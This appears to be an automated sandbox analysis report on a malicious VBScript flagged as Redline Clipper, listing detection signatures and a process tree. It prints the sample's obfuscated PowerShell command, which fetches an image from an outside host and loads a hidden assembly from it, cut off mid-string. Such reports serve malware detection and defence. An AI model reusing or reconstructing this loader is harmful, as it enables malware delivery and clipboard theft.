Edit tour
Windows
Analysis Report
confirmationcr.vbs
Overview
General Information
Detection
Redline Clipper
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell download and load assembly
VBScript performs obfuscated calls to suspicious functions
Yara detected Redline Clipper
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Creates autostart registry keys with suspicious values (likely registry only malware)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 1524 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\confi rmationcr. vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 2984 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe" - command "$ codigo = ' JDgTreBpDg TreG0DgTre YQBnDgTreG UDgTreVQBy DgTreGwDgT reIDgTreDg Tre9DgTreC DgTreDgTre JwBoDgTreH QDgTredDgT reBwDgTreH MDgTreOgDg TrevDgTreC 8DgTredwBh DgTreGwDgT rebDgTreBw DgTreGEDgT recDgTreBl DgTreHIDgT reYwBhDgTr eHYDgTreZQ DgTreuDgTr eGMDgTrebw BtDgTreC8D gTredQB3Dg TreHDgTreD gTreLwB1Dg TreHcDgTre cDgTreDgTr e0DgTreDID gTreMDgTre DgTrezDgTr eDkDgTreOQ DgTre0DgTr eC4DgTrecD gTreBuDgTr eGcDgTreJw DgTre7DgTr eCQDgTredw BlDgTreGID gTreQwBsDg TreGkDgTre ZQBuDgTreH QDgTreIDgT reDgTre9Dg TreCDgTreD gTreTgBlDg TreHcDgTre LQBPDgTreG IDgTreagBl DgTreGMDgT redDgTreDg TregDgTreF MDgTreeQBz DgTreHQDgT reZQBtDgTr eC4DgTreTg BlDgTreHQD gTreLgBXDg TreGUDgTre YgBDDgTreG wDgTreaQBl DgTreG4DgT redDgTreDg Tre7DgTreC QDgTreaQBt DgTreGEDgT reZwBlDgTr eEIDgTreeQ B0DgTreGUD gTrecwDgTr egDgTreD0D gTreIDgTre DgTrekDgTr eHcDgTreZQ BiDgTreEMD gTrebDgTre BpDgTreGUD gTrebgB0Dg TreC4DgTre RDgTreBvDg TreHcDgTre bgBsDgTreG 8DgTreYQBk DgTreEQDgT reYQB0DgTr eGEDgTreKD gTreDgTrek DgTreGkDgT rebQBhDgTr eGcDgTreZQ BVDgTreHID gTrebDgTre DgTrepDgTr eDsDgTreJD gTreBpDgTr eG0DgTreYQ BnDgTreGUD gTreVDgTre BlDgTreHgD gTredDgTre DgTregDgTr eD0DgTreID gTreBbDgTr eFMDgTreeQ BzDgTreHQD gTreZQBtDg TreC4DgTre VDgTreBlDg TreHgDgTre dDgTreDgTr euDgTreEUD gTrebgBjDg TreG8DgTre ZDgTreBpDg TreG4DgTre ZwBdDgTreD oDgTreOgBV DgTreFQDgT reRgDgTre4 DgTreC4DgT reRwBlDgTr eHQDgTreUw B0DgTreHID gTreaQBuDg TreGcDgTre KDgTreDgTr ekDgTreGkD gTrebQBhDg TreGcDgTre ZQBCDgTreH kDgTredDgT reBlDgTreH MDgTreKQDg Tre7DgTreC QDgTrecwB0 DgTreGEDgT recgB0DgTr eEYDgTrebD gTreBhDgTr eGcDgTreID gTreDgTre9 DgTreCDgTr eDgTreJwDg Tre8DgTreD wDgTreQgBB DgTreFMDgT reRQDgTre2 DgTreDQDgT reXwBTDgTr eFQDgTreQQ BSDgTreFQD gTrePgDgTr e+DgTreCcD gTreOwDgTr ekDgTreGUD gTrebgBkDg TreEYDgTre bDgTreBhDg TreGcDgTre IDgTreDgTr e9DgTreCDg TreDgTreJw DgTre8DgTr eDwDgTreQg BBDgTreFMD gTreRQDgTr e2DgTreDQD gTreXwBFDg TreE4DgTre RDgTreDgTr e+DgTreD4D gTreJwDgTr e7DgTreCQD gTrecwB0Dg TreGEDgTre cgB0DgTreE kDgTrebgBk DgTreGUDgT reeDgTreDg TregDgTreD 0DgTreIDgT reDgTrekDg TreGkDgTre bQBhDgTreG cDgTreZQBU DgTreGUDgT reeDgTreB0 DgTreC4DgT reSQBuDgTr eGQDgTreZQ B4DgTreE8D gTreZgDgTr eoDgTreCQD gTrecwB0Dg TreGEDgTre cgB0DgTreE YDgTrebDgT reBhDgTreG cDgTreKQDg Tre7DgTreC QDgTreZQBu DgTreGQDgT reSQBuDgTr eGQDgTreZQ B4DgTreCDg TreDgTrePQ DgTregDgTr eCQDgTreaQ BtDgTreGED gTreZwBlDg TreFQDgTre ZQB4DgTreH QDgTreLgBJ DgTreG4DgT reZDgTreBl DgTreHgDgT reTwBmDgTr eCgDgTreJD gTreBlDgTr eG4DgTreZD gTreBGDgTr eGwDgTreYQ BnDgTreCkD gTreOwDgTr ekDgTreHMD gTredDgTre BhDgTreHID gTredDgTre BJDgTreG4D gTreZDgTre BlDgTreHgD gTreIDgTre DgTretDgTr eGcDgTreZQ DgTregDgTr eDDgTreDgT reIDgTreDg TretDgTreG